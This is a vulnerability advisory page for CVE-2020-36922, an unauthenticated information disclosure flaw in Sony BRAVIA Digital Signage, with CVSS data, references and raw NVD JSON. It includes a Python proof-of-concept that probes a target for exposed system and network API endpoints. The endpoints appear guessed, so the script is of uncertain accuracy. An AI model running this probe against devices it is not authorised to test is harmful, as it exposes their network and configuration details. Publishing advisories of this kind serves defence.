Security Vulnerability Report
中文
CVE-2020-36922 CVSS 7.5 HIGH

CVE-2020-36922

Published: 2026-01-06 16:15:49
Last Modified: 2026-01-22 21:20:38
Source: [email protected]

Description

Sony BRAVIA Digital Signage 1.7.8 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive system details through API endpoints. Attackers can retrieve network interface information, server configurations, and system metadata by sending requests to the exposed system API.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sony:bravia_signage:*:*:*:*:*:*:*:* - VULNERABLE
Sony BRAVIA Digital Signage 1.7.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2020-36922 PoC - Sony BRAVIA Digital Signage Information Disclosure # Target: Sony BRAVIA Digital Signage API endpoints def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2020-36922 """ vulnerabilities = [] # Common API endpoints that may expose information endpoints = [ '/api/system/info', '/api/network/interfaces', '/api/server/config', '/api/system/metadata', '/api/v1/system', '/api/v1/network' ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': 'application/json' } for endpoint in endpoints: try: url = target_url.rstrip('/') + endpoint response = requests.get(url, headers=headers, timeout=10, verify=False) if response.status_code == 200: try: data = response.json() vulnerabilities.append({ 'endpoint': endpoint, 'status_code': response.status_code, 'data': data }) print(f'[+] Vulnerable endpoint found: {endpoint}') print(f' Data: {json.dumps(data, indent=2)}') except: if len(response.text) > 0: vulnerabilities.append({ 'endpoint': endpoint, 'status_code': response.status_code, 'data': response.text[:500] }) except requests.exceptions.RequestException as e: print(f'[-] Error accessing {endpoint}: {e}') return vulnerabilities if __name__ == '__main__': import sys if len(sys.argv) < 2: print('Usage: python cve-2020-36922.py <target_url>') print('Example: python cve-2020-36922.py http://192.168.1.100:8080') sys.exit(1) target = sys.argv[1] print(f'[*] Scanning target: {target}') print(f'[*] CVE-2020-36922: Sony BRAVIA Digital Signage Information Disclosure\n') results = check_vulnerability(target) if results: print(f'\n[!] {len(results)} vulnerable endpoints found') else: print('\n[*] No vulnerable endpoints detected')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36922", "sourceIdentifier": "[email protected]", "published": "2026-01-06T16:15:48.597", "lastModified": "2026-01-22T21:20:37.917", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sony BRAVIA Digital Signage 1.7.8 contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive system details through API endpoints. Attackers can retrieve network interface information, server configurations, and system metadata by sending requests to the exposed system API."}, {"lang": "es", "value": "Sony BRAVIA Digital Signage 1.7.8 contiene una vulnerabilidad de revelación de información que permite a atacantes no autenticados acceder a detalles sensibles del sistema a través de puntos finales de la API. Los atacantes pueden recuperar información de la interfaz de red, configuraciones del servidor y metadatos del sistema enviando solicitudes a la API del sistema expuesta."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sony:bravia_signage:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.8", "matchCriteriaId": "52C80402-E933-4ADC-BB1A-B82CD69D64BF"}]}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2020120028", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192606", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://packetstorm.news/files/id/160343", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://pro-bravia.sony.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pro-bravia.sony.net/resources/software/bravia-signage/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://pro.sony/ue_US/products/display-software", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/49187", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/sony-bravia-digital-signage-unauthenticated-system-api-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.